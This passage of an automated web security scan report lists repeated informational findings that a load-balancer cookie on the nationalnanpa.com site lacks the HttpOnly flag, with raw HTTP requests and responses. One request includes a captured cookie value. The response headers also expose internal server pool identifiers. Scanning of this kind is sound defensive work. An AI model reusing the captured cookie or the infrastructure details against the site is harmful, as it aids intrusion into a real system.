The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/ma.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:08:00 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:08 GMT
ETag: "a81e7-35a1-471ab6bc10200"
Accept-Ranges: bytes
Content-Length: 13729
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a............3..f..........3..33.3f.3..3..3..f..f3.ff.f..f..f......3..f..............3..f..............3..f.........3..3.33.f3..3..3..33.33333f33.33.33.3f.3f33ff3f.3f.3f.3..3.33.f3..3..3..3..3.33
...[SNIP]...

13.58. http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /area_code_maps/usmaps/us.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /area_code_maps/usmaps/us.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:07:17 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:19 GMT
ETag: "a81ea-a407-471ab6c68dac0"
Accept-Ranges: bytes
Content-Length: 41991
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a0.t...............Ds.s................{xv................h......JPJ........s..................xxx662..................EE8..................qiT....

..shggVjV}ve.......~9c{d.....u......Tfn.._..?.
...[SNIP]...

13.59. http://www.nationalnanpa.com/contact_us/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /contact_us/index.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact_us/index.html HTTP/1.1
Host: www.nationalnanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nanpaid=0pprNLkhCcB1pQ1rBhlS98x58j4xyVXr4Nxq9fyyRKTyJpYpkTf9!-242160596

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:17 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 410
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.60. http://www.nationalnanpa.com/content/img/cm_areaMap.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/cm_areaMap.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/cm_areaMap.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:58 GMT
ETag: "a004b-64ed-486e397200980"
Accept-Ranges: bytes
Content-Length: 25837
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:18 15:40:35.........
...[SNIP]...

13.61. http://www.nationalnanpa.com/content/img/codeMap_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/codeMap_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/codeMap_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a002a-6fa-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 1786
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....d.d......Ducky.......2......Adobe.d..........................
..
.......................#"""#''''''''''.    ..    
   .        ...................................!! !!''''''''''...........
...[SNIP]...

13.62. http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/fastTrack_bg.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/fastTrack_bg.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:52 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 19:45:59 GMT
ETag: "a0033-3eef-486e3972f4bc0"
Accept-Ranges: bytes
Content-Length: 16111
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

......JFIF.....H.H.....|Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:18 15:30:22.........
...[SNIP]...

13.63. http://www.nationalnanpa.com/content/img/feedBack_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/feedBack_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/feedBack_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 16:02:34 GMT
ETag: "28773-5d-4871cd1b55a80"
Accept-Ranges: bytes
Content-Length: 93
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.......SSS666PPP===JJJ:::TTTQQQ444NNNHHHEEEBBBLLL......!.......,..........
..2.R.%q...;

13.64. http://www.nationalnanpa.com/content/img/hp_img_a.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/hp_img_a.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_a.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:49 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "28789-55b7-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 21943
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:21 14:29:25.........
...[SNIP]...

13.65. http://www.nationalnanpa.com/content/img/hp_img_b.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/hp_img_b.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/hp_img_b.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:53 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:29:41 GMT
ETag: "2877d-56fa-4871edfd6af40"
Accept-Ranges: bytes
Content-Length: 22266
Content-Type: image/jpeg
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i...............
....'..
....'.Adobe Photoshop CS4 Windows.2010:05:21 14:28:37.........
...[SNIP]...

13.66. http://www.nationalnanpa.com/content/img/leftNav_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/leftNav_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/leftNav_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 18:39:01 GMT
ETag: "a004a-40-486e2a7b17b40"
Accept-Ranges: bytes
Content-Length: 64
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a........g;.`7.M,.F(.V1.i<......!.......,...........8B.U    .;

13.67. http://www.nationalnanpa.com/content/img/legal_bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/legal_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/legal_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:34 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 17:58:29 GMT
ETag: "28785-5c-486e216bc1b40"
Accept-Ranges: bytes
Content-Length: 92
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.......................................................!.......,..........    ..A.(...#.;

13.68. http://www.nationalnanpa.com/content/img/mainbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/mainbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/mainbg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:15 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 18:56:25 GMT
ETag: "a003a-1ea-471ab6cc46840"
Accept-Ranges: bytes
Content-Length: 490
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a...    ..............................................................................................................................................................................................
...[SNIP]...

13.69. http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nanpa_hp_logo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nanpa_hp_logo.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:21:00 GMT
ETag: "28770-1fa-486e0ba1b7300"
Accept-Ranges: bytes
Content-Length: 506
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89af.!.......V.u...x.........S?4lZ......g..Exh$_L.......G1,....f.!......I..8....`(.di.h..l..p,.tm.x..|n8@..P!....A......Q....."....,.....f..`.2p$....0.......f..._.
..    H......    Y..@t....mf....@y..[..
...[SNIP]...

13.70. http://www.nationalnanpa.com/content/img/nav_acMap_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_acMap_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2877e-5cc-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1484
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W..U.~S.|R..T.S..V...E.}.....................E.~E.|t..E....^..a...t......._..^......t..%.f5.s%.l......T..T..5.v%.j......d....\E...5.r5.qT..T..%.ht.....t..T....`d..5.t.....gE.|.
...[SNIP]...

13.71. http://www.nationalnanpa.com/content/img/nav_acMap_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_acMap_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_acMap_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a0031-5ce-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1486
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..F..D..C..E..D..G............A.r.........q..@.qA.sA.u.....P...........S..Q..P......... .Y...q..!._1.gA.r!.]q.......Na..A.t...Q.~1.j...1.fQ..q.....0.e..Ra..Q.~q..1.h...Q.Q.}...!
...[SNIP]...

13.72. http://www.nationalnanpa.com/content/img/nav_act_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_act_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a002e-501-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1281
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W.~S.|R..U.S..V..TE.}..................E.|....._..^E.~...E.....5.r.....^5.s5.t....\t....a...d..5.v...d.....E.|t..E....d....t..%.l%.jE.......T.............g...E.......bE....5
...[SNIP]...

13.73. http://www.nationalnanpa.com/content/img/nav_act_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_act_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_act_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a004d-502-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1282
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..C..F..G..D..E...A.r............@.q.....P..QA.s...........PA.u1.f...1.g..N..Sq..1.hq.....a.....a..1.jA.q............l.....l....Vq..A.vA.tA.wl..l..A.r!.]...Q..........S.......
...[SNIP]...

13.74. http://www.nationalnanpa.com/content/img/nav_login_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_login_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:33 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "2876a-530-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a........{Q..X..W.S.~S.|R..V..U..T...............E.}......E.~...t..E.t..E.....t..5.sE...^E..t....5.tE.|...t.....5.v.....aE.|...T..T.....%.j.._.....%.l...d.....t..%.f..E.{E....dd.......g5.r.
...[SNIP]...

13.75. http://www.nationalnanpa.com/content/img/nav_login_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_login_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_login_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:35 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "28784-530-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1328
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........B..I..H..D..D..C..G..F..E...............A.sq.....A.r............A.uA.tq.....A.rA.q..Pq..A.v...1.h1.gA.tq........@.q1.j.....S.........Q.}@.o...l.. .YA.wQ.~l..a..l..a..!.]...!._...q..l..q
...[SNIP]...

13.76. http://www.nationalnanpa.com/content/img/nav_numRes_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_numRes_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:36 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "28764-62c-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/

GIF89a.........X.{Q..W.~S..U.S..T.|R..V...E.}............E.~......E.|.._E..t..E.E.|..^.....a......5.st..E....d....\%.lt.....d.....5.t5.rt..5.v.....^t..%.j........E..%.gd.....%.f5.qd.......T..E.{T
...[SNIP]...

13.77. http://www.nationalnanpa.com/content/img/nav_numRes_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_numRes_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_numRes_on.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:30 GMT
Server: Apache
Last-Modified: Tue, 18 May 2010 16:16:12 GMT
ETag: "a003f-62c-486e0a8f0eb00"
Accept-Ranges: bytes
Content-Length: 1580
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........I..B..H..D..F..D..E..C..G...A.r.........A.s.........@.q.....Qq..A.u...A.rA.tA.q..P........S......A.t1.ga..!._.....Nq.....q.....a..........Pq..1.h1.j1.fq..!.]...a.. .Y...!.ZA.v0.e...a...
...[SNIP]...

13.78. http://www.nationalnanpa.com/content/img/nav_pub_off.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_pub_off.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/img/nav_pub_off.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.nationalnanpa.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:06:32 GMT
Server: Apache
Last-Modified: Fri, 21 May 2010 18:19:52 GMT
ETag: "a0045-542-4871ebcbb4200"
Accept-Ranges: bytes
Content-Length: 1346
Content-Type: image/gif
Set-Cookie: BIGipServernas-ns=2869930176.20480.0000; path=/

GIF89a.........X.{Q..W..U.S.~S..T.|R..V.........E.}...E.~E........E.E.|...E.|...E.t..t.......^..a.....5.sE.......\d.....5.qd......._%.f5.t......%.l5.vT..d..t....d..g...d..5.u%.l....^........5.w.
...[SNIP]...

13.79. http://www.nationalnanpa.com/content/img/nav_pub_on.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalnanpa.com
Path:   /content/img/nav_pub_on.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

